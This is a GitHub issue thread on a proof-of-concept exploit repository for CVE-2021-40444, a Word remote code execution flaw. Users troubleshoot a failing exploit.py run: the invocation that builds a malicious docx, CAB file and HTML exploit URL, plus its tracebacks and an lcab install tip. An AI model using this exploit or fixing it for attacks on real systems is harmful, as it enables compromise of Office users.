CVE-2021-40444 icon indicating copy to clipboard operation
CVE-2021-40444 copied to clipboard

Published 20 hours ago verified publisher icon lockedbyte

Error got while genarating playload

Open IT21117664 opened this issue 3 years ago • 2 comments

This is the error

[%] CVE-2021-40444 - MS Office Word RCE Exploit [%] [*] Option is generate a malicious payload...

[ == Options == ] [ DLL Payload: test/calc.dll [ HTML Exploit URL: http://192.168.1.2

[] Writing HTML Server URL... [] Generating malicious docx file... sh: 1: zip: not found [] Generating malicious CAB file... [] Updating information on HTML exploit... Traceback (most recent call last): File "/home/rmb/CVE-2021-40444/exploit.py", line 154, in generate_payload() File "/home/rmb/CVE-2021-40444/exploit.py", line 119, in generate_payload p_exp = open('word.html', 'r') OSError: [Errno 22] Invalid argument: 'word.html'

how can fix that

IT21117664 avatar Sep 22 '21 10:09 IT21117664

You need to install lcab first (sudo apt-get install lcab)

oflavioc avatar Oct 12 '21 00:10 oflavioc

###################################################### But it says it is already installed. (but this is a WSL) ###################################################### └─$ sudo apt-get install lcab [sudo] password for rmb: Reading package lists... Done Building dependency tree... Done Reading state information... Done lcab is already the newest version (1.0b12-7+b1). 0 upgraded, 0 newly installed, 0 to remove and 49 not upgraded.

###################################################### This is the full error of CVE-2021-40444 ######################################################

└─$ python3 exploit.py generate test/calc.dll http://192.168.1.2 [%] CVE-2021-40444 - MS Office Word RCE Exploit [%] [*] Option is generate a malicious payload...

[ == Options == ] [ DLL Payload: test/calc.dll [ HTML Exploit URL: http://192.168.1.2

[] Writing HTML Server URL... [] Generating malicious docx file... adding: [Content_Types].xml (deflated 75%) adding: _rels/ (stored 0%) adding: _rels/.rels (deflated 61%) adding: docProps/ (stored 0%) adding: docProps/app.xml (deflated 48%) adding: docProps/core.xml (deflated 50%) adding: word/ (stored 0%) adding: word/document.xml (deflated 85%) adding: word/fontTable.xml (deflated 74%) adding: word/settings.xml (deflated 63%) adding: word/styles.xml (deflated 89%) adding: word/theme/ (stored 0%) adding: word/theme/theme1.xml (deflated 79%) adding: word/webSettings.xml (deflated 57%) adding: word/_rels/ (stored 0%) adding: word/_rels/document.xml.rels zip warning: Invalid argument zip warning: could not open for reading: word/_rels/document.xml.rels

zip warning: Not all files were readable files/entries read: 15 (61K bytes) skipped: 1 (1.2K bytes) [] Generating malicious CAB file... [] Updating information on HTML exploit... Traceback (most recent call last): File "/home/rmb/CVE-2021-40444-new/exploit.py", line 154, in generate_payload() File "/home/rmb/CVE-2021-40444-new/exploit.py", line 119, in generate_payload p_exp = open('word.html', 'r') OSError: [Errno 22] Invalid argument: 'word.html'

IT21117664 avatar Oct 15 '21 02:10 IT21117664